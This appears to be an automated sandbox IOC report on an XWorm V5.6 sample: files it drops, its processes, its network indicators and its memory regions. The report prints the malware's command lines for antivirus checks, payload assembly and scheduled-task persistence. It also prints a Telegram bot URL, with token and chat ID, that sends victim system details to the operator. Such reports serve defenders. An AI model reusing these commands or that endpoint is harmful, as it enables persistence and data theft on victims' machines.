IOC Report
DA92phBHUS.exe

loading gif

Files

File Path
Type
Category
Malicious
DA92phBHUS.exe
PE32 executable (GUI) Intel 80386, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js
ASCII text, with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\438799\Dump.pif
PE32 executable (GUI) Intel 80386, for MS Windows
modified
malicious
C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\m
data
dropped
C:\Users\user\AppData\Local\Temp\438799\L
data
dropped
C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe
PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Flyer
data
dropped
C:\Users\user\AppData\Local\Temp\Highlighted
ASCII text, with very long lines (304), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Highlighted.bat
ASCII text, with very long lines (304), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Intensity
data
dropped
C:\Users\user\AppData\Local\Temp\Tale
data
dropped
C:\Users\user\AppData\Local\Temp\Threat
OpenPGP Public Key
dropped
C:\Users\user\AppData\Local\Temp\Turn
data
dropped
There are 4 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\DA92phBHUS.exe
"C:\Users\user\Desktop\DA92phBHUS.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy Highlighted Highlighted.bat & Highlighted.bat
malicious
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa opssvc"
malicious
C:\Windows\SysWOW64\findstr.exe
findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
malicious
C:\Windows\SysWOW64\cmd.exe
cmd /c md 438799
malicious
C:\Windows\SysWOW64\findstr.exe
findstr /V "pantyhoseyourslandscapesdisposition" Flyer
malicious
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Turn + ..\Tale + ..\Intensity L
malicious
C:\Users\user\AppData\Local\Temp\438799\Dump.pif
Dump.pif L
malicious
C:\Windows\SysWOW64\cmd.exe
cmd /c schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
malicious
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
malicious
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /tn "ImageSyncProX" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc onlogon /F /RL HIGHEST
malicious
C:\Windows\System32\wscript.exe
C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js"
malicious
C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr
"C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr" "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\m"
malicious
C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe
C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\choice.exe
choice /d y /t 15
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 10 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://api.telegram
unknown
malicious
193.41.226.233
malicious
https://api.telegram.org
unknown
malicious
https://api.telegram.org/bot
unknown
malicious
https://api.telegram.org/bot7981465575:AAEW4gOQw1_KaLtAHUtM3Ol8vEbq1ghRfE0/sendMessage?chat_id=6795213026&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A3CE6FBAD6367EB17AE37%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20L9CBEH%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWORM%20v5.6
149.154.167.220
malicious
http://www.autoitscript.com/autoit3/J
unknown
http://nsis.sf.net/NSIS_ErrorError
unknown
http://api.telegram.org
unknown
https://www.autoitscript.com/autoit3/
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://api.telegram.org/bot7981465575:AAEW4gOQw1_KaLtAHUtM3Ol8vEbq1ghRfE0/sendMessage?chat_id=67952
unknown
There are 1 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
api.telegram.org
149.154.167.220
malicious
nAtuEYczbaU.nAtuEYczbaU
unknown
malicious
206.23.85.13.in-addr.arpa
unknown
malicious

IPs

IP
Domain
Country
Malicious
149.154.167.220
api.telegram.org
United Kingdom
malicious
193.41.226.233
unknown
unknown
malicious

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
JScriptSetScriptStateStarted
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASMANCS
FileDirectory
There are 6 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
14C0000
trusted library allocation
page read and write
malicious
14B2000
trusted library allocation
page read and write
malicious
1032000
remote allocation
page execute and read and write
malicious
303A000
trusted library allocation
page read and write
malicious
1473000
heap
page read and write
malicious
14B6000
trusted library allocation
page read and write
malicious
151C000
trusted library allocation
page read and write
malicious
1513000
trusted library allocation
page read and write
malicious
1527000
trusted library allocation
page read and write
malicious
ED9000
heap
page read and write
27F48580000
heap
page read and write
50FE000
stack
page read and write
DCD000
heap
page read and write
1500000
trusted library allocation
page read and write
678B000
heap
page read and write
27F485EC000
heap
page read and write
7B1000
heap
page read and write
676D000
stack
page read and write
1517000
heap
page read and write
2829000
heap
page read and write
FC5000
heap
page read and write
D3E000
heap
page read and write
3006000
trusted library allocation
page read and write
7430000
heap
page read and write
F0B000
heap
page read and write
9DB000
stack
page read and write
33D9000
heap
page read and write
27F485B6000
heap
page read and write
3881000
heap
page read and write
5A3F000
stack
page read and write
7CF000
heap
page read and write
FA4000
heap
page read and write
107F000
heap
page read and write
2825000
heap
page read and write
3881000
heap
page read and write
E3A000
heap
page read and write
E28000
heap
page read and write
7A8000
heap
page read and write
523F000
stack
page read and write
FE1000
heap
page read and write
4021000
trusted library allocation
page read and write
79C000
heap
page read and write
E0A000
heap
page read and write
ED0000
unkown
page readonly
6ECD000
stack
page read and write
5520000
trusted library allocation
page read and write
F3C000
heap
page read and write
307C000
heap
page read and write
1590000
trusted library allocation
page read and write
3881000
heap
page read and write
F2A000
heap
page read and write
EBA000
heap
page read and write
D8F1FFE000
stack
page read and write
E09000
heap
page read and write
275E000
stack
page read and write
722D000
stack
page read and write
D92000
heap
page read and write
1443000
trusted library allocation
page execute and read and write
E9E000
heap
page read and write
7C7000
heap
page read and write
307C000
heap
page read and write
520000
heap
page read and write
3881000
heap
page read and write
4FC000
stack
page read and write
79C000
heap
page read and write
7BE000
heap
page read and write
1483000
heap
page read and write
27F485DC000
heap
page read and write
D53000
heap
page read and write
1444000
trusted library allocation
page read and write
585000
heap
page read and write
CE0000
heap
page read and write
7C5000
heap
page read and write
D2F000
heap
page read and write
79E000
heap
page read and write
11C5000
heap
page read and write
DCB000
heap
page read and write
E73000
heap
page read and write
54E0000
trusted library allocation
page read and write
D88000
heap
page read and write
3881000
heap
page read and write
3881000
heap
page read and write
2F0000
unkown
page readonly
E40000
unkown
page readonly
7BE000
heap
page read and write
1590000
trusted library allocation
page read and write
3F0000
heap
page read and write
4E90000
heap
page read and write
32FF000
stack
page read and write
F92000
heap
page read and write
C7C000
stack
page read and write
33D9000
heap
page read and write
EB4000
heap
page read and write
3881000
heap
page read and write
2F0000
unkown
page readonly
DCB000
heap
page read and write
102B000
heap
page read and write
16DD000
trusted library allocation
page read and write
EDF000
heap
page read and write
1387000
heap
page read and write
ED0000
unkown
page readonly
629C000
stack
page read and write
D53000
heap
page read and write
F41000
heap
page read and write
6C7E000
stack
page read and write
7BE000
heap
page read and write
6B3E000
stack
page read and write
1466000
trusted library allocation
page execute and read and write
3060000
heap
page read and write
68E000
stack
page read and write
6D7E000
stack
page read and write
306A000
heap
page read and write
320E000
stack
page read and write
9CE000
stack
page read and write
3038000
trusted library allocation
page read and write
FEC000
heap
page read and write
747C000
stack
page read and write
EA5000
heap
page read and write
1440000
heap
page read and write
4F4000
unkown
page readonly
3018000
trusted library allocation
page read and write
C52000
unkown
page readonly
E4D000
heap
page read and write
3072000
heap
page read and write
305D000
heap
page read and write
5550000
heap
page read and write
E14000
heap
page read and write
3881000
heap
page read and write
1490000
trusted library allocation
page read and write
113A000
heap
page read and write
3881000
heap
page read and write
304D000
trusted library allocation
page read and write
E10000
heap
page read and write
3881000
heap
page read and write
D8F21FF000
stack
page read and write
E0E000
heap
page read and write
FB3000
heap
page read and write
27F485CB000
heap
page read and write
794E000
stack
page read and write
131F000
heap
page read and write
1061000
heap
page read and write
2FFD000
trusted library allocation
page read and write
DAE000
heap
page read and write
2ECF000
unkown
page read and write
F3C000
heap
page read and write
2828000
heap
page read and write
E41000
heap
page read and write
E14000
heap
page read and write
1430000
trusted library allocation
page read and write
7AD000
heap
page read and write
3038000
heap
page read and write
67E3000
heap
page read and write
19A000
stack
page read and write
1060000
trusted library allocation
page read and write
294D000
stack
page read and write
1321000
heap
page read and write
DAE000
heap
page read and write
780E000
stack
page read and write
6CF000
stack
page read and write
33D9000
heap
page read and write
DCB000
heap
page read and write
13D8000
heap
page read and write
2EEE000
stack
page read and write
760000
heap
page read and write
6780000
heap
page read and write
1590000
trusted library allocation
page read and write
CBC000
stack
page read and write
3053000
trusted library allocation
page read and write
7A8000
heap
page read and write
144D000
trusted library allocation
page execute and read and write
1060000
trusted library allocation
page read and write
7AD000
heap
page read and write
C3E000
stack
page read and write
3042000
trusted library allocation
page read and write
2BF0000
heap
page read and write
2EF0000
heap
page read and write
27F485E4000
heap
page read and write
FEB000
heap
page read and write
2FA0000
trusted library allocation
page read and write
3881000
heap
page read and write
14B0000
trusted library allocation
page read and write
3881000
heap
page read and write
54D9000
trusted library allocation
page read and write
BA4000
heap
page read and write
1014000
heap
page read and write
1086000
heap
page read and write
12E0000
heap
page read and write
D62000
heap
page read and write
DDE000
heap
page read and write
1003000
heap
page read and write
E28000
heap
page read and write
1265000
heap
page read and write
E14000
heap
page read and write
587E000
stack
page read and write
3014000
trusted library allocation
page read and write
DA2000
heap
page read and write
3881000
heap
page read and write
401000
unkown
page execute read
3880000
heap
page read and write
27F4859C000
heap
page read and write
3881000
heap
page read and write
2F1000
unkown
page execute read
9BF000
stack
page read and write
11C0000
heap
page read and write
E14000
heap
page read and write
DCB000
heap
page read and write
3B0000
unkown
page read and write
324F000
stack
page read and write
33BD000
heap
page read and write
7C7000
heap
page read and write
2EFE000
stack
page read and write
150F000
stack
page read and write
54AE000
trusted library allocation
page read and write
3881000
heap
page read and write
3630000
heap
page read and write
1435000
heap
page read and write
27F48500000
heap
page read and write
400000
unkown
page readonly
7C4000
heap
page read and write
7BE000
heap
page read and write
E4F000
heap
page read and write
3060000
heap
page read and write
33DE000
stack
page read and write
2FC0000
heap
page read and write
336E000
stack
page read and write
580000
heap
page read and write
D9B000
heap
page read and write
E14000
heap
page read and write
7BE000
heap
page read and write
27F48900000
heap
page read and write
3078000
heap
page read and write
F62000
heap
page read and write
306C000
trusted library allocation
page read and write
89E000
stack
page read and write
3060000
heap
page read and write
1590000
trusted library allocation
page read and write
D8F000
heap
page read and write
2EF5000
heap
page read and write
E14000
heap
page read and write
1060000
heap
page read and write
27F485CD000
heap
page read and write
3F6F000
stack
page read and write
6D0000
heap
page read and write
1060000
trusted library allocation
page read and write
E14000
heap
page read and write
3C11000
trusted library allocation
page read and write
E51000
heap
page read and write
401000
unkown
page execute read
5700000
heap
page read and write
3881000
heap
page read and write
3881000
heap
page read and write
7AD000
heap
page read and write
3221000
heap
page read and write
EF7000
heap
page read and write
E14000
heap
page read and write
3CC6000
trusted library allocation
page read and write
102A000
heap
page read and write
271E000
stack
page read and write
7B1000
heap
page read and write
10B8000
heap
page read and write
12E8000
heap
page read and write
DF7000
stack
page read and write
3881000
heap
page read and write
1369000
heap
page read and write
1071000
heap
page read and write
DB2000
heap
page read and write
F22000
heap
page read and write
1462000
trusted library allocation
page read and write
F8E000
heap
page read and write
3B0000
unkown
page write copy
5496000
trusted library allocation
page read and write
1059000
heap
page read and write
1590000
trusted library allocation
page read and write
10B0000
heap
page read and write
BA4000
heap
page read and write
14E0000
trusted library allocation
page execute and read and write
7C7000
heap
page read and write
306A000
heap
page read and write
1590000
trusted library allocation
page read and write
3265000
heap
page read and write
BA4000
heap
page read and write
F00000
unkown
page write copy
3881000
heap
page read and write
879000
stack
page read and write
E09000
heap
page read and write
33EA000
heap
page read and write
51FE000
stack
page read and write
E73000
heap
page read and write
1590000
trusted library allocation
page read and write
43AF000
stack
page read and write
1061000
heap
page read and write
11BE000
stack
page read and write
E77000
heap
page read and write
2160000
heap
page read and write
F04000
unkown
page write copy
EF6000
unkown
page readonly
3660000
heap
page read and write
3A6000
unkown
page readonly
E8B000
heap
page read and write
54A2000
trusted library allocation
page read and write
1060000
trusted library allocation
page read and write
FE1000
heap
page read and write
5C7E000
stack
page read and write
F62000
heap
page read and write
27F485B6000
heap
page read and write
DC0000
direct allocation
page execute and read and write
FBC000
heap
page read and write
F09000
unkown
page readonly
5553000
heap
page read and write
145D000
trusted library allocation
page execute and read and write
E14000
heap
page read and write
33BD000
heap
page read and write
1003000
heap
page read and write
4ACF000
heap
page read and write
76A000
heap
page read and write
547A000
stack
page read and write
1060000
trusted library allocation
page read and write
27F485E7000
heap
page read and write
1E0F000
stack
page read and write
757D000
stack
page read and write
513F000
stack
page read and write
530000
heap
page read and write
69FE000
stack
page read and write
3030000
trusted library allocation
page read and write
2F08000
trusted library allocation
page read and write
27F485A1000
heap
page read and write
C50000
unkown
page readonly
3BF6000
trusted library allocation
page read and write
BA4000
heap
page read and write
1590000
trusted library allocation
page read and write
3030000
heap
page read and write
16E0000
heap
page read and write
639C000
stack
page read and write
1349000
heap
page read and write
6823000
heap
page read and write
103C000
remote allocation
page execute and read and write
D53000
heap
page read and write
146E000
heap
page read and write
76BE000
stack
page read and write
4FFC000
stack
page read and write
2E9F000
stack
page read and write
40B000
unkown
page read and write
DFA000
heap
page read and write
7C7000
heap
page read and write
1035000
heap
page read and write
666E000
stack
page read and write
6791000
heap
page read and write
300F000
stack
page read and write
F16000
heap
page read and write
1060000
trusted library allocation
page read and write
C4E000
stack
page read and write
79C000
heap
page read and write
32BE000
stack
page read and write
79C000
heap
page read and write
E00000
heap
page read and write
79C000
heap
page read and write
2EA0000
heap
page read and write
E06000
heap
page read and write
2829000
heap
page read and write
E1F000
heap
page read and write
EF6000
unkown
page readonly
10AF000
heap
page read and write
ED9000
heap
page read and write
F5B000
heap
page read and write
F3B000
heap
page read and write
6490000
trusted library allocation
page read and write
3250000
heap
page read and write
27F485EC000
heap
page read and write
1064000
heap
page read and write
7A8000
heap
page read and write
7B1000
heap
page read and write
33A8000
heap
page read and write
CC0000
heap
page read and write
7A8000
heap
page read and write
7AD000
heap
page read and write
301E000
trusted library allocation
page read and write
DAD000
heap
page read and write
3B6E000
stack
page read and write
21FE000
stack
page read and write
6DCE000
stack
page read and write
EDB000
heap
page read and write
5480000
heap
page execute and read and write
3B9000
unkown
page readonly
E41000
unkown
page execute read
517E000
stack
page read and write
E80000
heap
page read and write
D9F000
heap
page read and write
72AD000
stack
page read and write
16D0000
trusted library allocation
page read and write
1070000
heap
page read and write
F62000
heap
page read and write
306D000
heap
page read and write
FF9000
heap
page read and write
C5C000
stack
page read and write
351C000
stack
page read and write
3881000
heap
page read and write
21B0000
heap
page read and write
79C000
heap
page read and write
3036000
trusted library allocation
page read and write
28EB000
heap
page read and write
7AD000
heap
page read and write
4E0E000
stack
page read and write
2F3E000
stack
page read and write
306A000
heap
page read and write
105A000
heap
page read and write
1030000
remote allocation
page execute and read and write
FA6000
heap
page read and write
31C0000
heap
page read and write
1060000
trusted library allocation
page read and write
C7C000
stack
page read and write
22D0000
heap
page read and write
141E000
stack
page read and write
54C2000
trusted library allocation
page read and write
DD5000
heap
page read and write
3220000
heap
page read and write
306E000
heap
page read and write
E2A000
heap
page read and write
D56000
heap
page read and write
149D000
heap
page read and write
DA2000
heap
page read and write
14BC000
trusted library allocation
page read and write
3881000
heap
page read and write
76E000
heap
page read and write
1450000
trusted library allocation
page read and write
E75000
heap
page read and write
2EF0000
heap
page read and write
F7E000
heap
page read and write
147B000
trusted library allocation
page execute and read and write
3668000
heap
page read and write
309C000
stack
page read and write
7AD000
heap
page read and write
1003000
heap
page read and write
2DFF000
stack
page read and write
1046000
heap
page read and write
1060000
trusted library allocation
page read and write
98000
stack
page read and write
3059000
trusted library allocation
page read and write
27F485A1000
heap
page read and write
27F485D9000
heap
page read and write
7B1000
heap
page read and write
6F0C000
stack
page read and write
41F000
unkown
page read and write
3881000
heap
page read and write
D8F1CFD000
stack
page read and write
3881000
heap
page read and write
7CD000
heap
page read and write
F95000
heap
page read and write
1460000
trusted library allocation
page read and write
3881000
heap
page read and write
33E1000
heap
page read and write
106A000
heap
page read and write
145B000
heap
page read and write
FD0000
heap
page read and write
B0E000
stack
page read and write
5CA0000
heap
page read and write
9FC000
stack
page read and write
D53000
heap
page read and write
3A6000
unkown
page readonly
16B0000
heap
page read and write
380000
unkown
page readonly
583E000
stack
page read and write
57E000
stack
page read and write
DD0000
heap
page read and write
56F9000
stack
page read and write
10AF000
heap
page read and write
75BC000
stack
page read and write
1472000
trusted library allocation
page read and write
10D3000
heap
page read and write
3881000
heap
page read and write
33C2000
heap
page read and write
3B9000
unkown
page readonly
3881000
heap
page read and write
DFC000
heap
page read and write
7C7000
heap
page read and write
7A9000
heap
page read and write
2710000
heap
page read and write
D42000
heap
page read and write
29FE000
unkown
page read and write
D58000
heap
page read and write
304D000
heap
page read and write
F84000
heap
page read and write
3051000
heap
page read and write
D8F192A000
stack
page read and write
306A000
heap
page read and write
30F0000
heap
page read and write
BA0000
heap
page read and write
33DD000
heap
page read and write
124D000
heap
page read and write
71EB000
stack
page read and write
461000
unkown
page read and write
E14000
heap
page read and write
D53000
heap
page read and write
27F485BF000
heap
page read and write
303F000
stack
page read and write
1060000
trusted library allocation
page read and write
7AD000
heap
page read and write
D42000
heap
page read and write
1060000
trusted library allocation
page read and write
14DE000
stack
page read and write
E14000
heap
page read and write
3881000
heap
page read and write
1440000
trusted library allocation
page read and write
640000
heap
page read and write
1028000
heap
page read and write
E74000
heap
page read and write
7B1000
heap
page read and write
7C7000
heap
page read and write
4F4000
unkown
page readonly
3458000
heap
page read and write
27F4A3B0000
heap
page read and write
3881000
heap
page read and write
5240000
heap
page read and write
D64000
heap
page read and write
7B1000
heap
page read and write
7BE000
heap
page read and write
1590000
trusted library allocation
page read and write
1477000
trusted library allocation
page execute and read and write
2E5E000
stack
page read and write
99F000
stack
page read and write
F06000
heap
page read and write
2FC8000
heap
page read and write
3881000
heap
page read and write
30C0000
heap
page read and write
EF5000
heap
page read and write
3881000
heap
page read and write
E28000
heap
page read and write
E43000
heap
page read and write
E14000
heap
page read and write
33E4000
heap
page read and write
D3D000
heap
page read and write
1392000
heap
page read and write
107D000
heap
page read and write
D92000
heap
page read and write
5B3E000
stack
page read and write
2D40000
heap
page read and write
DBB000
heap
page read and write
22D5000
heap
page read and write
F00000
unkown
page read and write
2827000
heap
page read and write
E8D000
heap
page read and write
D8F23FE000
stack
page read and write
2FB0000
heap
page read and write
3CD4000
trusted library allocation
page read and write
3FC1000
trusted library allocation
page read and write
380000
unkown
page readonly
F09000
unkown
page readonly
3072000
trusted library allocation
page read and write
33EA000
heap
page read and write
D62000
heap
page read and write
F63000
heap
page read and write
F2A000
heap
page read and write
16E6000
heap
page read and write
742D000
stack
page read and write
7BE000
heap
page read and write
3881000
heap
page read and write
D94000
heap
page read and write
33E4000
heap
page read and write
281F000
stack
page read and write
28DD000
heap
page read and write
6AFE000
stack
page read and write
E41000
heap
page read and write
2CFD000
stack
page read and write
33E0000
heap
page read and write
107C000
heap
page read and write
D37000
heap
page read and write
D18000
heap
page read and write
D92000
heap
page read and write
3260000
heap
page read and write
DA2000
heap
page read and write
7AD000
heap
page read and write
27F485B6000
heap
page read and write
279F000
stack
page read and write
2F1000
unkown
page execute read
FB0000
heap
page read and write
14A3000
heap
page read and write
70EE000
stack
page read and write
4DCF000
stack
page read and write
1590000
trusted library allocation
page read and write
51BF000
stack
page read and write
2BF8000
heap
page read and write
5490000
trusted library allocation
page read and write
DB0000
heap
page read and write
54D0000
trusted library allocation
page read and write
22C0000
heap
page read and write
DE2000
heap
page read and write
3FAE000
stack
page read and write
1060000
trusted library allocation
page read and write
1061000
heap
page read and write
560000
heap
page read and write
F06000
heap
page read and write
27F485EC000
heap
page read and write
F2A000
heap
page read and write
3881000
heap
page read and write
E09000
heap
page read and write
E99000
heap
page read and write
E40000
unkown
page readonly
FE2000
heap
page read and write
800000
heap
page read and write
1590000
trusted library allocation
page read and write
E73000
heap
page read and write
27F485EC000
heap
page read and write
DC2000
heap
page read and write
305C000
stack
page read and write
13B1000
heap
page read and write
223E000
stack
page read and write
7A8E000
stack
page read and write
BA4000
heap
page read and write
7C7000
heap
page read and write
FC8000
heap
page read and write
54B6000
trusted library allocation
page read and write
D8F1DFF000
stack
page read and write
33EA000
heap
page read and write
E14000
heap
page read and write
27F48905000
heap
page read and write
5B7D000
stack
page read and write
10B5000
heap
page read and write
D62000
heap
page read and write
DDE000
heap
page read and write
64E0000
heap
page read and write
1050000
heap
page read and write
2FC1000
trusted library allocation
page read and write
F62000
heap
page read and write
F21000
heap
page read and write
D8F22FF000
stack
page read and write
7CF000
heap
page read and write
798E000
stack
page read and write
D53000
heap
page read and write
27F485E7000
heap
page read and write
D37000
heap
page read and write
307D000
trusted library allocation
page read and write
E69000
heap
page read and write
400000
unkown
page readonly
2AA000
stack
page read and write
CFB000
stack
page read and write
E04000
heap
page read and write
F92000
heap
page read and write
F20000
trusted library allocation
page read and write
E14000
heap
page read and write
10AF000
heap
page read and write
7B1000
heap
page read and write
D10000
heap
page read and write
B6E000
stack
page read and write
107B000
heap
page read and write
5500000
trusted library allocation
page execute and read and write
FDE000
heap
page read and write
FC5000
heap
page read and write
FD9000
heap
page read and write
76C0000
trusted library allocation
page execute and read and write
14F0000
heap
page execute and read and write
1060000
trusted library allocation
page read and write
EC1000
heap
page read and write
137F000
heap
page read and write
12CF000
stack
page read and write
2826000
heap
page read and write
27F48520000
heap
page read and write
304D000
heap
page read and write
F92000
heap
page read and write
27F485B6000
heap
page read and write
3060000
heap
page read and write
6510000
trusted library allocation
page read and write
111B000
heap
page read and write
3066000
trusted library allocation
page read and write
1060000
trusted library allocation
page read and write
5710000
heap
page read and write
EEE000
heap
page read and write
3098000
trusted library allocation
page read and write
6827000
heap
page read and write
27F484F0000
heap
page read and write
FA0000
heap
page read and write
1060000
trusted library allocation
page read and write
DA2000
heap
page read and write
BA4000
heap
page read and write
3FE9000
trusted library allocation
page read and write
304F000
heap
page read and write
DDE000
heap
page read and write
F4A000
heap
page read and write
E14000
heap
page read and write
29B0000
heap
page read and write
3BE8000
trusted library allocation
page read and write
3881000
heap
page read and write
D37000
heap
page read and write
32D0000
heap
page read and write
1590000
trusted library allocation
page read and write
1150000
heap
page read and write
D8F24FE000
stack
page read and write
1061000
heap
page read and write
E60000
heap
page read and write
1590000
trusted library allocation
page read and write
F92000
heap
page read and write
EDE000
heap
page read and write
726E000
stack
page read and write
79A000
heap
page read and write
1590000
trusted library allocation
page read and write
33EA000
heap
page read and write
2240000
heap
page read and write
3881000
heap
page read and write
ECC000
heap
page read and write
33E2000
heap
page read and write
BFE000
heap
page read and write
2F3F000
stack
page read and write
27F485EC000
heap
page read and write
2FBE000
stack
page read and write
308E000
trusted library allocation
page read and write
27F485BE000
heap
page read and write
732E000
stack
page read and write
3881000
heap
page read and write
DDD000
heap
page read and write
13A4000
heap
page read and write
E14000
heap
page read and write
E8B000
heap
page read and write
FBC000
heap
page read and write
DDE000
heap
page read and write
E11000
heap
page read and write
27F485EA000
heap
page read and write
1060000
trusted library allocation
page read and write
7F990000
trusted library allocation
page execute and read and write
11C8000
heap
page read and write
33EA000
heap
page read and write
F08000
heap
page read and write
33EA000
heap
page read and write
27F4A010000
heap
page read and write
7CD000
heap
page read and write
27F485E2000
heap
page read and write
33A0000
heap
page read and write
72EF000
stack
page read and write
1060000
trusted library allocation
page read and write
33DC000
heap
page read and write
1510000
heap
page read and write
153A000
trusted library allocation
page read and write
33BF000
heap
page read and write
64DD000
stack
page read and write
EA8000
heap
page read and write
D9E000
heap
page read and write
408000
unkown
page readonly
D9B000
heap
page read and write
4E60000
heap
page read and write
549B000
trusted library allocation
page read and write
549E000
trusted library allocation
page read and write
54F0000
trusted library allocation
page read and write
1060000
trusted library allocation
page read and write
784E000
stack
page read and write
34DF000
stack
page read and write
1453000
trusted library allocation
page read and write
30E1000
heap
page read and write
3881000
heap
page read and write
27F485DE000
heap
page read and write
54B1000
trusted library allocation
page read and write
27F48588000
heap
page read and write
307C000
heap
page read and write
33D9000
heap
page read and write
E5A000
heap
page read and write
27F485B6000
heap
page read and write
3221000
heap
page read and write
F20000
trusted library allocation
page read and write
361C000
stack
page read and write
3881000
heap
page read and write
E41000
unkown
page execute read
3B4000
unkown
page write copy
C5E000
unkown
page readonly
7B1000
heap
page read and write
800000
heap
page read and write
408000
unkown
page readonly
2ED0000
heap
page read and write
7BE000
heap
page read and write
DD0000
heap
page read and write
7A8000
heap
page read and write
2244000
heap
page read and write
D8D000
heap
page read and write
DC0000
trusted library allocation
page read and write
DF1000
heap
page read and write
7C7000
heap
page read and write
33E5000
heap
page read and write
3881000
heap
page read and write
1470000
trusted library allocation
page read and write
7A8000
heap
page read and write
305B000
trusted library allocation
page read and write
40B000
unkown
page write copy
3881000
heap
page read and write
33B8000
heap
page read and write
1670000
heap
page read and write
D36000
heap
page read and write
662C000
stack
page read and write
3881000
heap
page read and write
6C3E000
stack
page read and write
27F485EC000
heap
page read and write
30E5000
heap
page read and write
54BD000
trusted library allocation
page read and write
DE0000
heap
page read and write
6520000
heap
page read and write
D39000
heap
page read and write
F6F000
heap
page read and write
33EB000
heap
page read and write
D33000
heap
page read and write
F1D000
heap
page read and write
7A8000
heap
page read and write
700C000
stack
page read and write
D54000
heap
page read and write
4E4F000
stack
page read and write
5494000
trusted library allocation
page read and write
4D8E000
stack
page read and write
1314000
heap
page read and write
FB0000
heap
page read and write
E14000
heap
page read and write
770E000
stack
page read and write
BA4000
heap
page read and write
1590000
trusted library allocation
page read and write
E04000
heap
page read and write
304B000
trusted library allocation
page read and write
75F000
stack
page read and write
12FD000
heap
page read and write
DA3000
heap
page read and write
305C000
heap
page read and write
3B33000
trusted library allocation
page read and write
101F000
heap
page read and write
DFD000
heap
page read and write
30CC000
heap
page read and write
D8F20FE000
stack
page read and write
27F485EC000
heap
page read and write
308A000
trusted library allocation
